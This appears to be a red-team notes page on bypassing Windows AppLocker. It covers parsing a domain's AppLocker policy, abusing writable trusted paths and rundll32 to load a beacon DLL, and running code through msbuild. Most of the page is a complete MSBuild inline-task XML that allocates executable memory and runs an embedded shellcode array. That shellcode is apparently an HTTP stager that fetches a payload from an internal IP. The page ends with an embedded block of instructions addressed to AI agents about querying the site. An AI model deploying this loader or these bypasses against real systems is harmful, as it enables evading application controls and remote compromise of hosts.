# AppLocker

![](/files/B9kEWdnV3ZnsBpne8fjJ)

```shell
# https://github.com/PowerShell/GPRegistryPolicyParser
# Parse AppLocker Policy
Import-Module .\GPRegistryPolicyParser.psm1
Parse-PolFile -Path "\\marvel.local\sysvol\MARVEL.local\Policies\{FFA03B11-A48D-4B85-BC64-6E434DB8B7B2}\Machine\Registry.pol"
```

![](/files/x76Z7sOFt3RoW5xno3Eo)

#### Default Rules Bypass:

1. Executing untrusted code via trusts LOLBAS's.
2. Finding writeable directories within "trusted" paths.
3. By default, AppLocker is not even applied to Administrators.

```shell
# Search For Writable Paths By Normal Users
C:\Windows\Tasks\*

# Run through DLL
C:\Windows\System32\rundll32.exe C:\Windows\Tasks\beacon.dll,StartW
```

#### MSBUILD (Bypass2)

```powershell
# LOLBAS (https://lolbas-project.github.io/)
msbuild.exe shell.xml  
```

#### C# Code Inside XML (Bypass2 Cont.)

```xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
	  <Target Name="Hello">
	    <ClassExample />
	  </Target>
	  <UsingTask
	    TaskName="ClassExample"
	    TaskFactory="CodeTaskFactory"
	    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	    <Task>
	    
	      <Code Type="Class" Language="cs">
	      <![CDATA[
		using System;
		using System.Runtime.InteropServices;
		using Microsoft.Build.Framework;
		using Microsoft.Build.Utilities;
		public class ClassExample :  Task, ITask
		{         
		  private static UInt32 MEM_COMMIT = 0x1000;          
		  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
		  [DllImport("kernel32")]
		  private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
		  UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
		  [DllImport("kernel32")]
		    private static extern IntPtr CreateThread(            
		    UInt32 lpThreadAttributes,
		    UInt32 dwStackSize,
		    UInt32 lpStartAddress,
		    IntPtr param,
		    UInt32 dwCreationFlags,
		    ref UInt32 lpThreadId           
		    );
		  [DllImport("kernel32")]
		  private static extern UInt32 WaitForSingleObject(           
		    IntPtr hHandle,
		    UInt32 dwMilliseconds
		    );          
		  public override bool Execute()
		  {
		    //replace with your own shellcode
		    byte[] shellcode = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x69, 0x6d, 0x61, 0x67, 0x65, 0x33, 0x32, 0x2e, 0x67, 0x69, 0x66, 0x00, 0xbd, 0x12, 0x57, 0x44, 0x54, 0xcc, 0xf9, 0x59, 0x98, 0xc3, 0xa2, 0x58, 0x66, 0xd7, 0xe1, 0xf4, 0xf2, 0xcb, 0x99, 0xb0, 0x60, 0x5c, 0x82, 0x97, 0xf7, 0x36, 0xc6, 0x70, 0x03, 0x74, 0x71, 0x31, 0x73, 0x4b, 0xde, 0xa8, 0x04, 0xcc, 0xc5, 0x50, 0xc3, 0x1f, 0xd5, 0x95, 0xae, 0x94, 0xde, 0x6c, 0xc5, 0xc9, 0x8d, 0xcf, 0xa3, 0x4b, 0x73, 0x43, 0x7b, 0xd2, 0xd6, 0x0f, 0xed, 0xea, 0x02, 0xde, 0xbf, 0x0d, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x38, 0x39, 0x2e, 0x30, 0x29, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x2f, 0x32, 0x30, 0x31, 0x30, 0x30, 0x31, 0x30, 0x31, 0x20, 0x46, 0x69, 0x72, 0x65, 0x66, 0x6f, 0x78, 0x2f, 0x38, 0x39, 0x2e, 0x30, 0x0d, 0x0a, 0x00, 0x2c, 0x9d, 0x25, 0x4d, 0x5b, 0xdd, 0xe4, 0x73, 0xb5, 0x48, 0xd7, 0x62, 0x8f, 0x90, 0xc1, 0x4f, 0x39, 0x64, 0x4c, 0xd1, 0x92, 0xaa, 0xd2, 0x53, 0x71, 0x52, 0xe4, 0x20, 0x23, 0x63, 0x4d, 0x91, 0x5f, 0xfc, 0x30, 0x62, 0xc2, 0xcf, 0xa0, 0x00, 0x13, 0x89, 0xdd, 0x45, 0xc9, 0x3f, 0x48, 0x93, 0xa8, 0x0e, 0x69, 0xd6, 0x11, 0x7e, 0xf0, 0x84, 0x96, 0xbb, 0xaf, 0x8a, 0xd2, 0x37, 0x32, 0x63, 0x2c, 0x36, 0x37, 0xd1, 0x07, 0x63, 0x26, 0xcc, 0xe8, 0x02, 0x2e, 0xa5, 0x3e, 0x13, 0xfc, 0x64, 0x7e, 0xf2, 0x19, 0x4d, 0x56, 0x74, 0x0f, 0x24, 0x87, 0x2c, 0xb8, 0x1b, 0x40, 0xd9, 0x3a, 0xbd, 0xab, 0xa3, 0x32, 0xdd, 0x95, 0x43, 0x9c, 0x78, 0xbe, 0x0c, 0xd3, 0xd5, 0x34, 0xc1, 0xed, 0x66, 0x60, 0x4f, 0x5f, 0xbd, 0x5b, 0xd0, 0x75, 0x3c, 0x06, 0x27, 0x60, 0x88, 0xbc, 0xa5, 0x9a, 0xd8, 0x7f, 0x62, 0x10, 0xb8, 0xa5, 0xb9, 0xcd, 0xd3, 0x15, 0x2c, 0xe1, 0xad, 0xb4, 0xd7, 0x54, 0x46, 0xa4, 0x37, 0x95, 0xea, 0x9b, 0x15, 0xb4, 0xaf, 0xea, 0x93, 0x49, 0x6b, 0xe8, 0x50, 0xc7, 0x16, 0x87, 0xed, 0x2b, 0x99, 0xdb, 0x03, 0x6f, 0xb7, 0x29, 0xf0, 0xdb, 0x69, 0x1b, 0xa8, 0xb0, 0xe0, 0x85, 0x19, 0x34, 0x42, 0xb4, 0x12, 0xd6, 0x68, 0x26, 0x13, 0x04, 0x2c, 0xe1, 0xb3, 0x6b, 0xc6, 0x73, 0x92, 0xb7, 0x15, 0x26, 0xb9, 0x11, 0x11, 0xf4, 0x51, 0xe2, 0x35, 0x3a, 0x73, 0xe7, 0xbc, 0xd7, 0x31, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x28, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x32, 0x32, 0x32, 0x2e, 0x37, 0x36, 0x00, 0x12, 0x34, 0x56, 0x78 };
		      
		    UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
		    IntPtr hThread = IntPtr.Zero;
		    UInt32 threadId = 0;
		    IntPtr pinfo = IntPtr.Zero;
		    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
		    WaitForSingleObject(hThread, 0xFFFFFFFF);
		    return true;
		  }
		}   
	      ]]>
	      </Code>
	    </Task>
	  </UsingTask>
	</Project
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hsaad.gitbook.io/x/red-teaming/evasion-techniques/applocker.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.